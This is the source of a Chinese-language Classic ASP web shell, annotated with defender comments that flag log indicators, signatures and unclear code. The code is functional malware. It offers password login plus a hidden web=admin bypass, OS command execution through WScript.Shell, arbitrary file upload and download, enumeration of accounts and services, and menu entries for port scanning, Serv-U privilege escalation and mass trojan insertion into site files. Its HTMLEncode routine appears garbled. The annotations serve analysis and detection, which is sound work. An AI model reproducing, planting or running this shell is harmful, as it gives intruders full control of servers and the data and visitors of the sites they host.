<%
' Classic ASP (VBScript) web shell: global settings and static configuration.
' Defender note: the password, display name and notice strings below are fixed literals,
' which makes them usable as content signatures when hunting for copies of this file.
Server.ScriptTimeout=999999999
Response.Buffer =true
' From here on runtime errors are suppressed instead of producing an ASP error page.
On Error Resume Next
UserPass="643617" 'hard-coded access password (compared as plain text by the login check further down)
mName="BY:.尐飛" 'display name of the backdoor
Copyright="注:请勿用于非法用途,否则后果作者概不负责" 'copyright / notice text
' The next three statements repeat the settings above unchanged.
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
' ShowErr: if an error is pending, writes its description inside a history.back() link,
' then clears the error and flushes the response.
' Err.Description is written without HTML encoding.
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " &
Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub
' RRS: shorthand for Response.Write. The string is written exactly as passed in; no HTML
' encoding happens here, so any request value a caller concatenates reaches the page raw.
Sub RRS(str)
response.write(str)
End Sub
' RePath: doubles every backslash in S. The callers in this file use it when a Windows path
' is embedded in a JavaScript string literal inside a generated link.
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
' RRePath: inverse of RePath; collapses each doubled backslash in S back to a single one.
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
' Request context for the rest of the script.
' Request("...") without a collection name is looked up across the request collections
' (query string, form, cookies, ...), so Action / FolderPath / FName may arrive by GET or POST.
' Defender note: these parameter names are what appears in web-server logs and captured
' request bodies for this shell.
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
' serveru (host + script URL) and serverp (copy of the password) are assigned here;
' they are not read again in the visible part of the file.
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
' HTML fragment with a "back" link (返回) that result pages append.
BackUrl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
' Page shell: writes the HTML head (gb2312 charset), the dark-theme CSS and the client-side helpers.
' Client-side helpers emitted below:
'   killErrors - installed as window.onerror so browser script errors are hidden
'   yesok      - confirm() prompt used before destructive actions
'   runClock   - writes the local time to window.status every 100 ms
'   ShowFolder - puts a path into addrform.FolderPath and submits that form
'   FullForm   - fills hideform (FName, Action) and submits it; for copy/move actions the source
'                and the prompted destination are joined with "||||" in FName
' Defender note: the "||||" separator in the FName field and the Action names are distinctive
' in captured POST bodies.
' NOTE(review): mName1 and AD are not assigned in the visible part of the file - confirm where they come from.
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html;
charset=gb2312"">"
RRS"<title>"&mName1&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"",
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&" --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value =
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value =
FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全
名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名
称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名
称"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value =
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"</script>"
' The body tag gets scroll=no only on the frameset page (no Action given).
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
' Component inventory used throughout the script:
'   ObT(i,0) = COM ProgID, ObT(i,1) = availability mark filled in by the loop below,
'   ObT(i,2) = description shown in the UI (file system, command shell, Access/Jet, ADO,
'   third-party upload components, mail components, XMLHTTP).
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"
' Probe every ProgID by instantiating it on each request. Error -2147221005 (0x800401F3,
' invalid class string) is recorded as unavailable; any other outcome is recorded as available.
' Defender note: the file, shell and stream components probed here are what the shell's
' features are built on; restricting them for the web application's identity removes the
' corresponding functionality.
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj=" ×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
' Current browsing directory is kept in Session("FolderPath"): a FolderPath request value
' replaces it (after undoing the backslash doubling); if the session has none yet, it
' starts at the script's own directory.
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
' MainForm: renders the outer frameset page.
' - hideform: hidden form (Action, FName) that the client-side FullForm helper submits into the FileFrame iframe
' - addrform: address bar that posts FolderPath back to this script
' - two iframes: the menu (?Action=MainMenu) and the file listing (?Action=Show1File)
' Session("FolderPath") is written into the value attribute without encoding.
' A second definition of MainForm with an identical body appears later in the file.
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
' Sets the session's authenticated marker (the same key and value the login check tests)
' whenever the request parameter web equals "admin"; no password is compared on this path.
' This statement sits above the login check, so it runs on every request before that check.
' Defender note: during log review, requests carrying this parameter should be treated as
' authenticated access to the shell, i.e. use was not limited to holders of the password.
' NOTE(review): URL holds a string assigned earlier, so URL() is not a call to a defined
' routine; presumably the resulting error is swallowed by On Error Resume Next - confirm.
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
' MainForm (second definition; the body is identical to the earlier MainForm in this file).
' Renders the outer frameset page: the hidden hideform (Action, FName) targeted at the
' FileFrame iframe, the address-bar form that posts FolderPath, and the two iframes for
' the menu (?Action=MainMenu) and the file listing (?Action=Show1File).
' Session("FolderPath") is written into the value attribute without encoding.
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
' MainMenu: renders the left-hand navigation frame.
' The rows after the folder shortcuts link to the shell's features through the Action query
' parameter: Course, getTerminalInfo, ServerInfo, Cmd1Shell, ScanPort, Servu, ReadREG, EditFile,
' UpFile, kmuma, Cplgm (M=1..3), plgm and Logout; NewFolder is submitted through FullForm.
' Defender note: these Action values are the request indicators to search for in web-server logs.
' NOTE(review): the Cplgm / plgm handlers are not in the visible part of the file; judging by the
' link labels only, they concern bulk insertion, removal and replacement of content in site files.
' NOTE(review): SiteURL2, mName2 and Copyright2 are not assigned in the visible part of the file.
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font
color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
' ObT(0,1) is the availability mark for Scripting.FileSystemObject: without it only
' 无权限 (no permission) is shown; with it, the drive list (LBF.ShowDriver) and shortcut
' links to the site root, the script directory and several fixed Windows folders.
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder
("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath
(RootPath)&""")'>→本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program
Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
End If
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→
系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo'
target='FileFrame'>→终端端口-自动登录</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo'
target='FileFrame'>→服务信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>
→执行CMD命令</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>
→端口扫描器</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→
Serv-u提权</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→
读取注册表</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath
(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录
<hr></a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>
→新建文本</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→
上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查
找木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>
→高级挂马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>
→批量清马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>
→批量替换</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>
→低级挂马</a></b></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登
录</a></td></tr>"
RRS"<tr><td align=center
style='color:red'><hr>"&Copyright2&"</td></tr></table>"
RRS"</table>"
End Function
' unPack: opens the Access (Jet) database at thePath, reads the table FileData and writes each
' row's fileContent column to disk at <script directory>\<row's thePath column>, creating
' missing folders first. SaveToFile is called with option 2, which overwrites existing files.
' Errors are suppressed for the whole routine.
' Defender note: the effect is a bulk write of files under the web directory in one request;
' file-integrity monitoring on the web root would show it as a burst of creations/overwrites.
' NOTE(review): fsoX is not defined in the visible part of the file; ws is declared but never assigned.
Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False
Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
' createFolder: walks thePath one backslash at a time and creates each prefix that does not
' exist yet. The existence test uses the prefix including its trailing backslash; the create
' call uses the same prefix without it.
' NOTE(review): fsoX is not defined in the visible part of the file.
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fsoX.FolderExists(Left(thePath, i)) = False
Then
fsoX.CreateFolder(Left(thePath, i - 1))
End If
' Advance i to the next backslash, or stop when none is left.
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
' Course: enumerates the objects returned for the ADSI path WinNT://. and renders them as an
' HTML table of accounts/groups and services.
' - objects whose StartType reads as "" get a row labelled 系统用户(组) (system user / group)
' - StartType 2/3/4 is displayed as 自动/手动/禁用 (automatic / manual / disabled)
' - automatic-start entries whose path does not have "win" at characters 4-6 are collected
'   in SI1 and shown in red; every other object goes to SI2 in blue
' Errors are suppressed, so a failing property read does not stop the loop.
' Defender note: this is local account and service discovery performed under the web
' application's identity; names and paths are written to the page without encoding.
Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> "
SI=SI&"系统用户(组)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF""
colspan=""2""> </td></tr>"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399FF> "&obj.path&"</font></td></tr>"
end if
next
RRS SI&SI0&SI1&SI2&"</table>"
End Function
' ServerInfo: renders a table with the server name, local IP address, current time, processor
' count, operating system and web-server software (all read from Request.ServerVariables or
' Now), followed by one row per entry of the ObT component table with its availability mark.
' The IP row is a form that posts the address to http://www.ip138.com/index.asp in a new
' window; that request is made by the viewer's browser, not by the server.
' Defender note: this is host and software-inventory discovery; the component rows show which
' COM objects the web application's identity is able to create.
Function ServerInfo()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#FFFFFF'>服务器IP</td><td
bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15'
value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器CPU数量</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器操作系统</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>WEB服务器版本</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)
&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
RRS SI
End Function
' DownFile: sends the file at Path to the client as a download. The file is loaded in binary
' mode through the stream component named in ObT(6,0) and written with Response.BinaryWrite;
' the download name is the part of Path after the last backslash.
' No restriction on Path is applied inside this function.
' Defender note: this is the shell's file-retrieval path; the response carries
' Content-Disposition: attachment with Content-Type application/octet-stream.
' NOTE(review): the call site is not in the visible part of the file, so where Path comes from is unconfirmed.
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
' HTMLEncode: applies a fixed list of character replacements to S and returns the result;
' when S is Null nothing is assigned, so the function returns Empty.
' NOTE(review): as the text appears here, the first three replacements map a character to
' itself and the CHR(34) line has an unbalanced string literal. Presumably the replacement
' strings were HTML entities that were decoded when this page was extracted - confirm
' against the raw sample before relying on this listing.
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function
' UpFile: file upload page and handler.
' - With Action2=Post: the multipart body is parsed by the UPC class, and the part named
'   LocalFile is saved to the full path given in the ToPath field. ToPath is used as supplied.
' - Otherwise: renders the upload form, with ToPath pre-filled as <current folder>\diy3.asp.
' Defender notes:
' - the request is a multipart/form-data POST to ?Action=UpFile&Action2=Post with the field
'   names ToPath and LocalFile
' - diy3.asp is the default target name and therefore a file name worth searching for
' - UName is echoed into the success message without encoding
Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="<br>请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
RRS SI
ShowErr()
Response.End
End If
SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?
Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&"<tr><td>"
SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session
("FolderPath")&"\diy3.asp")&"' size='40'>"
SI=SI&" <input name='LocalFile' type='file' size='25'>"
SI=SI&" <input type='submit' name='Submit' value='上传'>"
SI=SI&"</td></tr></form></table>"
RRS SI
End Function
' Cmd1Shell: operating-system command execution page.
' Inputs: SP (program path, remembered in Session("ShellPath")), cmd (command line) and
' wscript ("yes" selects the Exec branch). The command only runs when cmd arrives in the POST form.
' - Exec branch: WScript.Shell.Exec of ShellPath & " /c " & cmd; stdout is appended to the page as-is.
' - Other branch: WScript.Shell.Run with output redirected to cmd.txt in the script's
'   directory; the file is read back, HTML-encoded, and then deleted.
' Defender notes:
' - both branches start a child process from the web server's worker process, so
'   process-creation auditing on the web server is the most direct detection point
' - the second branch briefly creates cmd.txt next to the script, visible to file-system auditing
' - SP and cmd are echoed into value attributes without encoding
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"'
Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input
type='submit' value='执行'><textarea Style='width:100%;height:440;'
class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
' ObT(1,0) is the ProgID "wscript.shell".
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
' The WScript.Shell object is created twice in a row; the second assignment replaces the first.
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
' Login check. A session counts as authenticated when Session("web2a2dmin") equals UserPass.
' - a posted pass field equal to UserPass sets that session value and redirects to the script URL
' - a wrong pass prints a notice and the request ends
' - with no pass field, the login form is built and the request ends
' The password is compared as plain text; no attempt limit or lockout is visible here.
' The top-level statements above this point (component probe, session folder handling and
' the web=admin statement) have already run when this check is reached.
' Defender note: login attempts are POSTs with the form field pass.
' NOTE(review): SiteURL and SIC are not assigned in the visible part of the file - confirm
' what the InStr test on SIC is meant to check.
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>HACK by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"&Copyright&"</center>"
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
' T1 is a script-level variable: UPC stores the raw request body in it and FIF.SaveAs reads from it.
Dim T1
' UPC: hand-written multipart/form-data parser, used by the upload handler.
'   D1 - dictionary of text fields (lower-cased name -> value; repeated names are joined with ", ")
'   D2 - dictionary of file fields (lower-cased name -> FIF object holding offset and size)
Class UPC
Dim D1,D2
' Form: value of the text field F, or "" when it is absent.
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
' UA: FIF object for the file field F, or a fresh empty FIF when it is absent.
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
' Class_Initialize: reads the whole request body (Request.TotalBytes) into the binary stream
' T1, takes the first line as the part delimiter, then walks the parts. For each part the
' header block is decoded as gb2312 text to extract the field name; parts with a filename
' become FIF entries (offset and size into T1), other parts are decoded as gb2312 text values.
' The file name and Content-Type positions are located but not stored.
' The entire body is buffered; no size limit is applied here.
Private Sub Class_Initialize
Dim
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
T2.Type = 1 : T2.Mode =3 : T2.Open
T1.Position = DStart
T1.CopyTo T2,DIEnd-DStart
T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
TIn = T2.ReadText : T2.Close
DStart = InStrB(DIEnd,TDa,TSt)
FStart = InStr(22,TIn,"name=""",1)+6
FEnd = InStr(FStart,TIn,"""",1)
UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
if InStr (45,TIn,"filename=""",1) > 0 then
set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
D2.add UpName,TFL
end if
else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
D1(UpName)=D1(UpName)&", "&SFV
else
D1.Add UpName,SFV
end if
end if
DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
End Sub
' Class_Terminate: empties both dictionaries and closes T1, but only when the request had a body.
Private Sub Class_Terminate
if Request.TotalBytes>0 then
D1.RemoveAll:D2.RemoveAll
set D1=nothing:set D2=nothing
T1.Close:set T1 =nothing
end if
End Sub
End Class
' FIF: descriptor of one uploaded file part - an offset (FileStart) and a byte count
